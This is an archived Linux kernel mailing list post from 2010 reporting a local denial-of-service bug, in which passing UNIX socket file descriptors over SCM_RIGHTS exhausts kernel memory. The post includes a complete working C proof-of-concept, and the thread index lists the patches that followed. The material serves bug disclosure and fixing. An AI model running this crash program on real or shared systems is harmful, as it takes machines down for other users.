mirror of https://lore.kernel.org/lkml/
 help / color / mirror / Atom feed
* Unix socket local DOS (OOM)
@ 2010-11-23 22:21 Vegard Nossum
  2010-11-23 23:11 ` Eric Dumazet
  0 siblings, 1 reply; 13+ messages in thread
From: Vegard Nossum @ 2010-11-23 22:21 UTC (permalink / raw)
  To: LKML; +Cc: Andrew Morton, Eugene Teo

Hi,

I found this program lying around on my laptop. It kills my box
(2.6.35) instantly by consuming a lot of memory (allocated by the
kernel, so the process doesn't get killed by the OOM killer). As far
as I can tell, the memory isn't being freed when the program exits
either. Maybe it will eventually get cleaned up the UNIX socket
garbage collector thing, but in that case it doesn't get called
quickly enough to save my machine at least.

#include <sys/mount.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static int send_fd(int unix_fd, int fd)
{
        struct msghdr msgh;
        struct cmsghdr *cmsg;
        char buf[CMSG_SPACE(sizeof(fd))];

        memset(&msgh, 0, sizeof(msgh));

        memset(buf, 0, sizeof(buf));
        msgh.msg_control = buf;
        msgh.msg_controllen = sizeof(buf);

        cmsg = CMSG_FIRSTHDR(&msgh);
        cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
        cmsg->cmsg_level = SOL_SOCKET;
        cmsg->cmsg_type = SCM_RIGHTS;

        msgh.msg_controllen = cmsg->cmsg_len;

        memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
        return sendmsg(unix_fd, &msgh, 0);
}

int main(int argc, char *argv[])
{
        while (1) {
                pid_t child;

                child = fork();
                if (child == -1)
                        exit(EXIT_FAILURE);

                if (child == 0) {
                        int fd[2];
                        int i;

                        if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
                                goto out_error;

                        for (i = 0; i < 100; ++i) {
                                if (send_fd(fd[0], fd[0]) == -1)
                                        goto out_error;

                                if (send_fd(fd[1], fd[1]) == -1)
                                        goto out_error;
                        }

                        close(fd[0]);
                        close(fd[1]);
                        goto out;

                out_error:
                        fprintf(stderr, "error: %s\n", strerror(errno));
                out:
                        exit(EXIT_SUCCESS);
                }

                while (1) {
                        pid_t kid;
                        int status;

                        kid = wait(&status);
                        if (kid == -1) {
                                if (errno == ECHILD)
                                        break;
                                if (errno == EINTR)
                                        continue;

                                exit(EXIT_FAILURE);
                        }

                        if (WIFEXITED(status)) {
                                if (WEXITSTATUS(status))
                                        exit(WEXITSTATUS(status));
                                break;
                        }
                }
        }

        return EXIT_SUCCESS;
}


Vegard

^ permalink raw reply	[flat|nested] 13+ messages in thread

end of thread, other threads:[~2010-11-29 10:37 UTC | newest]

Thread overview: 13+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2010-11-23 22:21 Unix socket local DOS (OOM) Vegard Nossum
2010-11-23 23:11 ` Eric Dumazet
2010-11-23 23:25   ` Vegard Nossum
2010-11-24  0:09   ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
2010-11-24 19:17     ` David Miller
2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2010-11-24 14:44     ` Andi Kleen
2010-11-24 15:18       ` Eric Dumazet
2010-11-24 16:25         ` Andi Kleen
2010-11-24 17:14         ` David Miller
2010-11-26  8:50     ` Michal Hocko
2010-11-27  2:27       ` David Miller
2010-11-29 10:37         ` Michal Hocko

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox

all inboxes | Powered by JetHome®